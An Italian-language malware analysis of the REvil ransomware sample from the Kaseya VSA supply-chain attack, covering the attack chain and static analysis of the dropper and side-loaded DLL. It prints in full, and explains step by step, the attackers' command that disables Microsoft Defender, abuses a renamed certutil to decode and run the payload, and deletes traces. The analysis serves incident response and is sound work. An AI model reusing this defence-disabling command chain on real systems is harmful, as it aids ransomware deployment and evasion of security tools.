Analisi sample Revil kaseya

Il 2 luglio Kaseya ha pubblicato un avviso in cui affermava di essere sotto attacco informatico con impatti sulla suite VSA. Tale software consente di eseguire la gestione delle patch e il monitoraggio delle infrastrutture e sistemi informatici.
Nei giorni successivi si è scoperto essere un attacco Ransomware di tipo Supply-chain.

Inizio della compromissione

Il payload malevolo è stato inviato ai server VSA e, a sua volta, alle applicazioni Agent VSA in esecuzione sui dispositivi Windows gestiti. Ciò ha fornito a Revil e all’operator specifico la possibilità di avviare l’attacco. In questo modo, i criminali hanno:

• avviato la compromissione attraverso un canale attendibile;
• sfruttato la fiducia nel codice dell’agente VSA, riflessa nelle‎‎ esclusioni software anti-malware‎‎ necessarie al software Kaseya.

Tutto ciò che viene eseguito dal Kaseya Agent Monitor viene quindi ignorato a causa di tali esclusioni, che hanno permesso ai criminali di distribuire il proprio dropper senza controllo.

Pe poter causare maggior danni ed essere eseguito in maniera indisturbata, i criminali hanno forzato tramite il software Kaseya la disabilitazione del software AntiVirus e avviato il Ransomwre tramite il comando :

C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true – EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode – Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

ping 127.0.0.1 -n 4979> nul 
Viene utilizzato come timer, eseguendo un certo numero random (in questo caso 4979) di volte “echo null” a localhost.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Contiene un comando PowerShell per disabilitare la protezione di Microsoft Defender andando a disabilitare le seguenti features:

• Real-time protection
• Network protection against exploitation of known vulnerabilities
• Scanning of all downloaded files and attachments
• Scanning of scripts
• Ransomware protection
• Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
• Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
• Automatic sample submission to Microsoft

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe 
Crea una copia dell’utility dei servizi certificati e la posiziona in C:\Windows\cert.exe.
È possibile utilizzare certutil.exe per eseguire il dump e visualizzare le informazioni di configurazione dell’autorità di certificazione (CA), configurare i servizi certificati, i componenti CA di backup e ripristino e verificare i certificati, le coppie di chiavi e le catene di certificati.

echo %RANDOM% >> C:\Windows\cert.exe
Appende alla fine del file un numero casuale alla fine del file cert.exe per cercare di evadere le soluzioni di sicurezza che controllano che l’hash di cert.exe

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
La copia di CERTUTIL viene usata per decodificare il payload cifrato in Base64 del file AGENT.CRT e lo scrive nell’eseguibile AGENT.EXE, nella working directory di Kaseya.

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
Il file di payload originale C:\KWORKING\AGENT.CRT  e la copia di CERTUTIL vengono cancellati.

c:\kworking\agent.exe
In fine, il processo AGENTMON.EXE esegue AGENT.EXE. In tal modo, il nuovo processo eredita i privilegi di sistema di AGENTMON e ha inizio il dropping del ransomware.

Analisi Statica

File iniziale

Tag

Dropper

Dettagli

Descrizione

File firmato da PB03 TRANSPORT LTD risultante essere il malware dropper di Revil/Sodinokibi. Tale dropper ha lo scopo di creare due file nel percorso hardcoded “C:\Windows\”. I due payload sono contenuti all’interno del dropper stesso, attraverso il riferimento a due risorse.

Primo file droppato

Tag

Microsoft Windows Defender

Dettagli

Descrizione

Il file risulta essere una copia legittima di Microsoft Windows Defender (MsMpEng.exe).
Dopo aver eseguito il side-load della dll malevola, questa copia di Defender viene sfruttata per eseguire la fase di crittografia dei file attraverso un processo legittimo.

Secondo file droppato

Tag

Revil

Dettagli

Dettagli

Dll malevola contenete il payload di Revil e che viene caricata nel legittimo eseguibile di Windows Defender per eseguire le operazioni di crittografia.
La dll esporta tre funzioni: ServiceCrtMain,  ServiceMain,  SvchostPushServiceGlobals.
Tramite ServiceCrtMain avviene il recupero e l’esecuzione delle istruzioni dannose.

Indicatori di Compromissione (IOC)